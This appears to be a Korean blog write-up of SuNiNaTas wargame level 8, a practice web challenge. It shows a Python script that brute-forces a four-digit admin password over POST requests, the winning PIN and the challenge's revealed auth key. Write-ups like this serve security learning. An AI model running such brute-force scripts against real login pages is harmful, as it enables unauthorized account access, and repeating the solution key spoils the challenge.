Write-up

[SuNiNaTas] level 8

ch4rli3kop 2019. 4. 13. 21:52
반응형

Suninatas level 8

keyword : brute force

<!-- Hint : Login 'admin' Password in 0~9999 -->
<!-- M@de by 2theT0P -->

brute force 문제인 것 같다.

id와 pw를 입력했을 때의 fiddler로 잡아본 결과 id와 pw는 body에 들어가고 POST 요청으로 나가는 것을 확인할 수 있었다.

적당히 다음과 같은 코드를 짜서 돌리면 된다.

import urllib.request

target = 'http://suninatas.com/Part_one/web08/web08.asp'
r = urllib.request.Request(target)
r.add_header("Cookie","ASPSESSIONIDCSAARTSC=KELNKLFBEBIHLHILKGKJNOBN")
for i in range(0, 9999):
   data = urllib.request.urlopen(r, ('id=admin&pw=' + str(i).zfill(4)).encode('utf-8')).read()
   print(str(i).zfill(4))
   if 'key' in str(data):
       break
print(data)

7707에서 터졌다!

7704
7705
7706
7707
b'\r\n\t\t<script>alert(\'Congratulation!\');</script>\r\n\t\r\n\r\n<html>\r\n\t<title>Game No.8</title>\r\n\t<head><link href="/include/style.css" rel="stylesheet" type="text/css"></head>\r\n\t<BODY>\r\n\t\t<form method="Post" action="./web08.asp">\r\n\t\t<br>\r\n\t\t\t\t<br>\r\n\t\t\t\t\t\t<br>\r\n\t\t\t\t\t\t\t\t<br>\r\n\t\t\t\t\t\t<br>\t\t\t\t\t\t\r\n\t\t\t\t<br>\r\n\t\t<br>\r\n\t\t<table width="240" cellpadding="0" cellspacing="0" align="center">\r\n\t\t\t\t<tr height="30">\r\n\t\t\t\t\t<td width="50%" class="table_top" align="center"><input type="button" name="main_btn" value="main" style="width:60" onclick="location.href=\'/main/main.asp\'"></td>\r\n\t\t\t\t\t<td width="50%" class="table_top" align="center"><input type="button" name="main_btn" value="Back" style="width:60" onclick="history.back()"></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30" class="table_main" >\r\n\t\t\t\t\t<td width="120" align="center" bgcolor="cccccc"><font size="2"><b>ID</b></font></td>\r\n\t\t\t\t\t<td width="120" align="center" bgcolor="cccccc"><input type="text" name="id" style="width:90" ></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30" class="table_main" >\r\n\t\t\t\t\t<td align="center" bgcolor="cccccc"><font size="2" ><b>PW</b></font></td>\r\n\t\t\t\t\t<td align="center" bgcolor="cccccc"><input type="password" name="pw" style="width:90" maxlength="4" ></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30">\r\n\t\t\t\t\t<td colspan="2" align="center" class="table_top" bgcolor="cccccc"><input type="button" name="btn" value="Login" onclick="submit()" size=20></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr class="table_main" height="30">\r\n\t\t\t\t\t<td colspan="2" align="center" bgcolor="cccccc">Authkey : l3ruteforce P@ssword</td>\r\n\t\t\t\t</tr>\r\n\t\t\t</table>\r\n\t\t</form>\r\n\t</BODY>\r\n</html>\r\n\r\n\r\n<!-- Hint : Login \'admin\' Password in 0~9999 -->\r\n<!-- M@de by 2theT0P -->'


반응형

'Write-up' 카테고리의 다른 글

[SuNiNaTas] level 23  (0) 2019.04.13
[SuNiNaTas] level 22  (0) 2019.04.13
[SuNiNaTas] level 7  (0) 2019.04.13
[SuNiNaTas] level 6  (1) 2019.04.13
[SuNiNaTas] level 5  (0) 2019.04.13